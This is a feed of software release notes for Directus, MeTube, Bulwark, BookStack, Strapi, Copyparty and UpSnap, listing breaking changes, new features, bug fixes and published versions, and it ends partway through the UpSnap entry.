Directus v12.0.0-rc.1

29 Mei 2026 om 15:10

⚠️ Potential Breaking Changes

Introduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*
Backward Compatibility: You can now use ?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.

Replaced status field with archived boolean in collection settings @alvarosabu (#27397)
Backward Compatibility: Existing collections with string-based status fields continue to work unchanged; newly created collections now default to a boolean "Archived" field instead of the string "Status" field

Deprecated the VResizeable component @formfcw (#27437)

Deprecation for extensions: The globally registered VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.

Updated type system, borders, and theme variables @formfcw (#27437)

Potential breaking change for theme extensions: headerShadow and sidebarShadow removed from LayoutConfig interface
Potential breaking change for theme extensions: boxShadow removed from header theme rules schema
Potential breaking change for theme extensions: sidebarShadow no longer exposed in layout wrapper state

Updated module navigation bar spacing and styling @HZooly (#27437)

Potential breaking change in theme extensions: Removed navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required — these props will simply no longer have any effect.

Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)

Breaking change — new behavior for versioned collections Published items in versioned collections are now locked. Edits must be made through the draft version.

Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)

Potential breaking change for extensions: The rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.

Changed license to MSCL-1.0-GPL (#27417)

Breaking Change: Relicensed from BUSL-1.1 to MSCL-1.0-GPL (Monospace Sustainable Core License, Version 1.0).

Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)

Potential breaking change for theme extensions: The theme properties navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.
Potential breaking change for theme extensions: Custom themes overriding any of these removed properties must migrate to the new shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.

Removed the extra confirmation step from the publish flow @alvarosabu (#27487)

Breaking change — new publish flow: Publishing a version no longer shows an additional confirmation dialog after confirming changes in the comparison modal. The item is published directly once the changes are confirmed.

Updated sidebar styles @formfcw (#27437)

Potential breaking change for theme extensions: Removed section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required — these props will simply no longer have any effect.
Potential breaking change for theme extensions: Removed sidebarShadow and headerShadow from defineLayout(). No action is required — these props will simply no longer have any effect.

Refactored focus ring from border/box-shadow to outline @formfcw (#27437)

Potential breaking change for theme extensions: borderColorFocus, boxShadowHover, and boxShadowFocus are removed from the theme schema — custom themes referencing these will lose their focus overrides silently
Potential breaking change for interface extensions that relied on --theme--form--field--input--border-color-focus or --theme--form--field--input--box-shadow-focus CSS variables will need to migrate to --theme--form--field--input--focus-ring-color

Updated header bar elements and deprecated the headline slot @formfcw (#27437)

Deprecation for extensions: The headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.

Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)
The IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.

@directus/app
- Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397 by @formfcw)
- Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437 by @formfcw)
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
- Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
- Removed the extra confirmation step from the publish flow @alvarosabu (#27487 by @alvarosabu)
@directus/api
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/themes
- Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
- Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
- Updated sidebar styles @formfcw (#27437 by @formfcw)
- Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
  
  :::notice
  - Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
  - Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
  - Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.
  :::
@directus/types
- Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
- Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
- Updated sidebar styles @formfcw (#27437 by @formfcw)
- Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
  
  :::notice
  - Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
  - Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
  - Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.
  :::
@directus/extensions
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/extensions-registry
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/extensions-sdk
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/format-title
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/memory
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/pressure
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/release-notes-generator
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/update-check
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/validation
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/schema
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/schema-builder
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/specs
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-cloudinary
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-supabase
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-azure
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-gcs
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-local
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/storage-driver-s3
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/stores
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
create-directus-extension
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
create-directus-project
- Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
@directus/env
- Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)
@directus/sdk
- Refactor sdk error to use class over object (#27417 by @ComfortablyCoding)
  
  :::warning
  Requests that fail will now throw a RequestError instead of returning a response with an error property.
  :::

✨ New Features & Improvements

@directus/app
- Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
- Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
- Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)
- Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)
- Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
- Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)
- Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)
- Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
- Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)
- Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)
- Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
- Updated module bar buttons style @HZooly (#27437 by @formfcw)
- Deprecated the VResizeable component @formfcw (#27437 by @formfcw)
- Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)
- Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
- Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)
- Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)
- Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
- Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)
- Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)
- Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)
- Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)
- Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)
- Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
- Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)
  
  :::notice
  - Deprecation for extensions: The actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.
  :::
- Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)
- Put the sidebar into the content area @HZooly (#27437 by @formfcw)
- Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)
- Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)
- Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)
- Added version select to collection page @alvarosabu (#27397 by @formfcw)
- Updated sidebar styles @formfcw (#27437 by @formfcw)
- Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)
- Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)
- Improved bookmark flow @formfcw (#27450 by @formfcw)
- Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)
- Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
- Introduced VersionChip component @formfcw (#27437 by @formfcw)
- Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)
- Updated collab avatar indicator design @formfcw (#27437 by @formfcw)
- Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
  
  :::notice
  - Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
  - Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
  - Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.
  :::
- Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
- Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)
- Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)
- Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)
- Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)
@directus/api
- Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
- Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
- Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
- Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
- Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
- Added support for item-less versions @Nitwel (#27397 by @formfcw)
- Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
@directus/constants
- Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
@directus/env
- Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
@directus/system-data
- Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
- Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
@directus/types
- Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
- Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
- Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
- Added support for item-less versions @Nitwel (#27397 by @formfcw)
- Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
@directus/errors
- Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
@directus/composables
- Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
- Added version select to collection page @alvarosabu (#27397 by @formfcw)
@directus/themes
- Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
- Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
- Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
@directus/utils
- Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
@directus/sdk
- Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
- Added support for item-less versions @Nitwel (#27397 by @formfcw)
@directus/specs
- Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
@directus/visual-editing
- Redesigned the editable-element overlay with theming, RTL support and improved a11y @formfcw (#27469 by @formfcw)

🐛 Bug Fixes & Optimizations

@directus/app
- Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
- Limited mobile sidebar width so the overlay can be tapped to close it @HZooly (#27437 by @formfcw)
- Bumped vue-tsc to 3.1.8 (#27437 by @formfcw)
- Fixed icon alignment in v-divider component @HZooly (#27437 by @formfcw)
- Fixed v-dialog returning focus to opener instead of an autofocused child on close @formfcw (#27464 by @formfcw)
- Fixed flow handle button alignment in flow editor @HZooly (#27437 by @formfcw)
- Shown "Import in background" checkbox only when a file is selected @HZooly (#27437 by @formfcw)
- Fixed sidebar reopening at minimum size after being collapsed via drag handle @HZooly (#27437 by @formfcw)
- Fixed vue console warnings related to the comparison modal (#27538 by @formfcw)
- Fixed misaligned filter editor in search bar @formfcw (#27454 by @formfcw)
- Changed back button behavior, always navigates one level up @HZooly (#27437 by @formfcw)
- Fixed repeater interface ignoring per-field translations and $t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)
- Fixed calendar layout toolbar responsiveness @HZooly (#27437 by @formfcw)
- Fixed items not being selectable in the collection drawer when the Kanban layout is used while the parent item is opened in a version context @alvarosabu (#27427 by @alvarosabu)
- Fixed bookmark icon and color not showing in header @formfcw (#27437 by @formfcw)
- Fixed UI freeze caused by WYSIWYG interface when its non-editable state toggles @formfcw (#27515 by @formfcw)
@directus/api
- Fixed registration email verification tokens to use the configured secret fallback when SECRET is missing. (#27406 by @rijkvanzanten)
- Bumped axios, js-cookie, samlify, systeminformation, simple-git, fast-uri dependencies (#27589 by @br41nslug)
- Fixed MCP OAuth dynamic client registration defaults and metadata responses. (#27628 by @hanneskuettner)
- Updated IP blocking (#27606 by @br41nslug)
- Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
@directus/constants
- Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
@directus/system-data
- Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
- Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
@directus/types
- Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
- Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
@directus/utils
- Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
@directus/ai
- Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
@directus/release-notes-generator
- Ignored private workspace packages when generating release notes (#27637 by @licitdev)

📦 Published Versions

@directus/app@16.0.0-rc.0
@directus/api@36.0.0-rc.0
@directus/ai@1.3.2-rc.0
@directus/composables@11.5.0-rc.0
@directus/constants@14.4.0-rc.0
create-directus-extension@12.0.0-rc.0
create-directus-project@13.0.0-rc.0
@directus/env@6.0.0-rc.0
@directus/errors@2.4.0-rc.0
@directus/extensions@4.0.0-rc.0
@directus/extensions-registry@4.0.0-rc.0
@directus/extensions-sdk@18.0.0-rc.0
@directus/format-title@13.0.0-rc.0
@directus/memory@4.0.0-rc.0
@directus/pressure@4.0.0-rc.0
@directus/release-notes-generator@3.0.0-rc.0
@directus/schema@14.0.0-rc.0
@directus/schema-builder@1.0.0-rc.0
@directus/specs@14.0.0-rc.0
@directus/storage@13.0.0-rc.0
@directus/storage-driver-azure@13.0.0-rc.0
@directus/storage-driver-cloudinary@13.0.0-rc.0
@directus/storage-driver-gcs@13.0.0-rc.0
@directus/storage-driver-local@13.0.0-rc.0
@directus/storage-driver-s3@13.0.0-rc.0
@directus/storage-driver-supabase@4.0.0-rc.0
@directus/stores@3.0.0-rc.0
@directus/system-data@4.5.0-rc.0
@directus/themes@2.0.0-rc.0
@directus/types@16.0.0-rc.0
@directus/update-check@14.0.0-rc.0
@directus/utils@13.5.0-rc.0
@directus/validation@3.0.0-rc.0
@directus/visual-editing@2.1.0-rc.0
@directus/sdk@22.0.0-rc.0

Release 2026.05.29

MeTube

Door: github-actions[bot]

29 Mei 2026 om 13:55

Docker Images

Docker images have been built and pushed:

Docker Hub:

alexta69/metube:latest
alexta69/metube:2026.05.29

GitHub Container Registry:

ghcr.io/alexta69/metube:latest
ghcr.io/alexta69/metube:2026.05.29

Changes

fix pnpm upgrade to the correct package age limit (baa72c0)
review fixes (cf2d2dd)
fix catch (56c0ad3)
upgrade dependencies (4478d13)
fix(ui): drop redundant tooltip on share button (ad92607)
feat(ui): warn before share + surface failures for large files (6ff364a)
feat(ui): add iOS Web Share button next to download link (39a8948)
remove circle and make labels with help text have an underline (f034858)
make ui more mobile mobile-friendly (e2773db)

v1.7.2 - Scheduled Send, .eml Drag-Out & Zip Import, and Per-Domain Branding

Bulwark

Door: rathlinus

28 Mei 2026 om 20:35

1.7.2 (2026-05-28)

Features

Mail: Scheduled send and send delay (#322)
Mail: Drag emails out to the file explorer as .eml
Mail: Import emails from .zip archives
Mail: "Move to Trash and mark as read" delete action (#323)
Mail: Include group inboxes in the unified mailbox view (#328)
Mail: Locale-aware date format in the email list with a preset picker (#331)
Mail: Allow drag-and-drop into shared mailboxes
Composer: Ctrl/Cmd+Enter sends the open draft
Settings: New Downloads tab with template editor for .eml and attachment filenames
Settings: Filename transform settings and an ASCII-only "date (from-to) subject" template
Settings: Post-export action (keep / archive / trash)
Settings: Template for multi-email .zip filenames
Admin: Per-domain branding editor with overrides on /api/config, manifest, and PWA icon (#332)
Admin: Policy-controlled push relay URL with optional user lock
i18n: NEXT_PUBLIC_DEFAULT_LOCALE for fallback UI locale (#243)

Fixes

Mail: Editable HTML signature in new mail; clean state on every compose entry (#329)
Mail: Report real upload progress with XHR progress events (#333)
Mail: Restore blob: in object-src and frame-src CSP for PDF/HTML previews
Mail: Match user-avatar treatment on quick reply
Email viewer: Stop shattering table cells with word-break: break-word
Composer: Scope Ctrl/Cmd+Enter send to the focused composer
Composer: Stop closing the form when editing any field
Pro: Keep the empty viewer pane visible in the split layout
Pro: Prevent an empty main pane when reordering tabs across panes
Mobile: Collapse focus mail layout to multi-line
Mobile: Keep a gutter on bare-HTML and plain-text emails
Calendar: Align continued multi-week events with the week's left edge
Calendar: Show the end date in the event popover for multi-day events (#318)
Calendar: Convert recurrenceRules to singular in batch create
Calendar: Handle malformed event dates (#316)
Files: Stop URL-encoding drag-out filenames and preserve Unicode letters
Routing: Prefix remaining <img>, favicon, and WebDAV URLs with basePath (#319)
Routing: Prefix hand-written URLs with basePath for subpath deployments
Auth: OAUTH_ALLOW_PRIVATE_ENDPOINTS for split-DNS setups

i18n

Add missing translation keys across 16 locales

BookStack v26.05

BookStack

Door: ssddanbrown

28 Mei 2026 om 13:41

Links

Upgrade Notices

Folder Permissions - Due to some changes in how fonts are used for exports, after updating you may need to ensure that the storage/fonts folder (and all folders within that) are accessible & writable by the web-server. If you start seeing errors on PDF export after updating, it's likely this issue. See this page for guidance on setting permissions.
Revision Access - Revision access & visibility is now controlled separately to pages. In some cases, after upgrading, users may no longer be able to access revisions by default (for example, where users had access to view page content but had no role-level view permissions).

Full List of Changes

Added page contents view to page editor. (#6131, #4218)
Added API endpoints for browsing tags. (#6095, #5835)
Added custom font load handling for default PDF renderer. (#6109, #148, #719, #5770)
Added in-UI option to reset user multi-factor authentication methods. Thanks to @clauvaldez. (#6056)
Added hints to sort rule selection alongside empty lists. (#5967)
Added specific permission for revision viewing. (#6108, #4526)
Added new image and CSS CSP controls. Thanks to @Zhey-on. (#6071, #6033)
Added Thai language support. (#6105)
Updated codebase to meet PHPStan Level 4. (#6085)
Updated comment/description WYSIWYG editor to support inline code. (#6100, #6003)
Updated HTML to plain text conversion handling. (#6083)
Updated image upload handling to validate referenced page. (#6126)
Updated JavaScript packages. (#6090)
Updated module install command with usability improvements. (#6094, #6066)
Updated new WYSIWYG editor with a range of fixes. (#6119, #5631)
Updated translations with latest Crowdin changes. (#6084)
Fixed misaligned link attachment validation rules. (#6093)
Fixed non-ascii character issues in headers on PDF exports. Thanks to @alexwoo-awso. (#6069, #6107)

v5.47.0

Strapi

Door: internal-releases[bot]

28 Mei 2026 om 14:34

5.47.0 (2026-05-28)

🚀 New feature

BETA: MCP server (#26371)
publicationFilter param in REST and document service (#25793)
admin-tokens: remove adminTokens future flag (#26391)
admin: add documentation helper link in HeaderLayout (#26422)

🔥 Bug fix

Relation Search in Nested Components (#26023)
unable to access content manager page with required and private … (#24101)
admin: gate expiresIn deprecation on user auth options (#26298)
admin: redirect active tab to login on session expiry (#26165)
admin: avoid serving extensionless admin paths as static files (#26368)
content-manager: content history crash on deleted relations (#26245)
core: preserve createdBy/updatedBy on drafts created by discard-drafts migration (#26461)
core/core: codeBlockValidator uses language instead of syntax (#26392)
graphql: inherit publicationFilter into populated relations (#26400)

⚙️ Chore

dedupe yarn.lock file (#26376)
fix dependabot cooldown config for github-actions (#26438)
ci: improve dependabot security grouping and version update policy (#26408)
commitlint: disable body-max-line-length rule (#26406)
deps: bump simple-git from 3.32.3 to 3.36.0 (#26220)
deps: bump sanitize-html from 2.13.0 to 2.17.4 (#26342)
deps: bump ws from 8.17.1 to 8.20.1 in @strapi/data-transfer (#26379)
examples: remove sdk-plugin from todo-example plugin (#26341)
strapi: upgrade webpack ecosystem dependencies (#26385)

💅 Enhancement

db: migration performance improvements (#25988)
provider-amazon-ses: replace node-ses with AWS SDK SESClient (#26054)
i18n: update and create Slovak translations (#25831)

❤️ Thank You

Adrien L @Adzouz
Andrei L @unrevised6419
Arav Menon @Arav-Menon
bartsmartshore @bartsmartshore
Bassel Kanso @Bassel17
Ben Irvin @innerdvations
Dhruv Chheda @chhedadhruv
DMehaffy @derrickmehaffy
Filip Ónodi @fonodi
Nico André @nclsndr
Sjouke de Vries @sjoukedv
Vishal Kumar Singh @singhvishalkr

s6-ready

Copyparty

Door: 9001

26 Mei 2026 om 21:42

read-only demo server at https://a.ocv.me/pub/demo/
docker image ╱ similar software ╱ client testbed

there is a discord server with an @everyone in case of future important updates, such as vulnerabilities (most recently 2026-03-08)

recent important news

v1.20.9 (2026-02-25) fixed CVE-2026-27948 (XSS)

🧪 new features

#1463 opds: improved compatibility with various clients (thx @kamaeff!) 9068ec6
#1485 users with read-access can now create get-only shares (thx @Scotsguy!) 0bb80e9
#1466 support the s6 service notification protocol (thx @mobin-2008!) 8c201b8 ca40647
download-as-zip/tar: the toplevel folder can be renamed with url-param &name=foo or entirely removed with &name cc5420a
#1487 option to generate music spectrograms with logarithmic frequency scale (thx @9hax!) 83dc20f
option to set custom name/path for ffmpeg/ffprobe binaries 5e806ec
#1489 audio playback of mka files

🩹 bugfixes

#1480 #1482 fix get-only shares not expiring if the creator is removed (thx @celinke97 and @Scotsguy!) 3b53a22
#1474 toggling between cropped/fullsize coverart for music didn't work 926c6e8
#1470 files from the year 30828 would break file listing 27031f7
#1494 fix js-crash when dragging a pic from the gallery out of the browser (thx @icxes!) 7d81b9e
"fancy markdown editor" didn't work on phones 6183540
improve signal handling f4f97b6
- if I messed something up then --sig-thr or send 7x sigterm

🔧 other changes

docker: the arm32 build of the iv image has graduated 6e75faa
- copyparty/iv is now only available for i386 / x86_64 / aarch64
docker: rawpy is no longer bundled; now using libraw directly 348b4bb
- creating thumbnails of .raw photos is now MUCH slower but quality is also much better
partyfuse: switch to mfusepy; adds fuse3 support and improves performance b2401ff
additional advisory tiers for use with the vulnerability-checker 4e9ad78
clarify behavior of xvol regarding permissions e327183
packaging/docs:
- #1479 freebsd: fix deps in rc.d (thx @Kansattica!) f432ef6
- #1458 macos docs (thx @ilotoki0804!) d7eb556

🌠 fun facts

there will be a tiny handful of copyparty stickers at dokomi this weekend

💾 what to download?

download link	is it good?	description
copyparty-sfx.py	✅ the best 👍	runs anywhere! only needs python
copyparty-en.py	✅ also good	same but english-only, no i18n
a docker image	it's ok	good if you prefer docker 🐋
copyparty.exe	⚠️ acceptable	for win8 or later; built-in thumbnailer
u2c.exe	⚠️ acceptable	CLI uploader as a win7+ exe (video)
copyparty.pyz	⚠️ acceptable	similar to the regular sfx, mostly worse
copyparty-en.pyz	⚠️ acceptable	english-only, no smb-server
copyparty32.exe	⛔️ dangerous	for win7 -- never expose to the internet!
cpp-winpe64.exe	⛔️ dangerous	runs on 64bit WinPE, otherwise useless
bootable usb	┐(ﾟ∀ﾟ)┌	a surprisingly useful joke (x86_64)

except for u2c.exe, all of the options above are mostly equivalent
the zip and tar.gz files below are just source code
python packages are available at PyPI

5.4.0

UpSnap

Door: github-actions[bot]

26 Mei 2026 om 21:36

Note

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.

New Setup Process

GHSA-w4jr-728f-5jhq

What changed

